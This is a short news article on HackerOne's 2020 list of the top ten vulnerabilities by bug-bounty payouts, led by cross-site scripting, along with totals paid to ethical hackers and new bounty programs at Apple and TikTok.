Cross-site scripting (XSS) has taken the cake in 2020 for being the most impactful vulnerability and thus the one reaping the highest rewards for ethical hackers this year for the second year in a row. This is all according to a list of Top 10 Vulnerabilities released on Thursday by HackerOne.
The vulnerability which enabled attackers to inject client-side scripts into web pages viewed by other users – earned hackers 4.2 million in total bug-bounty awards in the last year, with a 26-percent increase from what was paid out in 2019 for finding XSS flaws, according to the report.
Aside from XSS following on that list of top 10’s was information disclosure, Server-Side Request Forgery (SSRF), insecure direct object reference (IDOR), privilege escalation, SQL injection, improper authentication, code injection and cross-site request forgery (CSRF).
All in all, companies paid ethical hackers $23.5 million in bug bounties for all of these flaws this year, according to HackerOne, which maintains a database of 200,000 vulnerabilities found by hackers.
Attackers may use XSS vulnerabilities to gain control of online user’s accounts and steal PII, this includes passwords, bank numbers, credit card info, Social Security numbers and the like. While they account for 18 percent of all reported vulnerabilities, ethical hackers are actually underpaid for finding them, according to HackerOne.
“Indeed, even large tech companies who were historically resistant to being transparent about their product’s security protocols have warmed to the idea of awarding ethical hackers for their work. Both Apple (Links to an external site.) and ByteDance’s TikTok (Links to an external site.) rolled out public, award-based bug-bounty programs in the last 12 months.”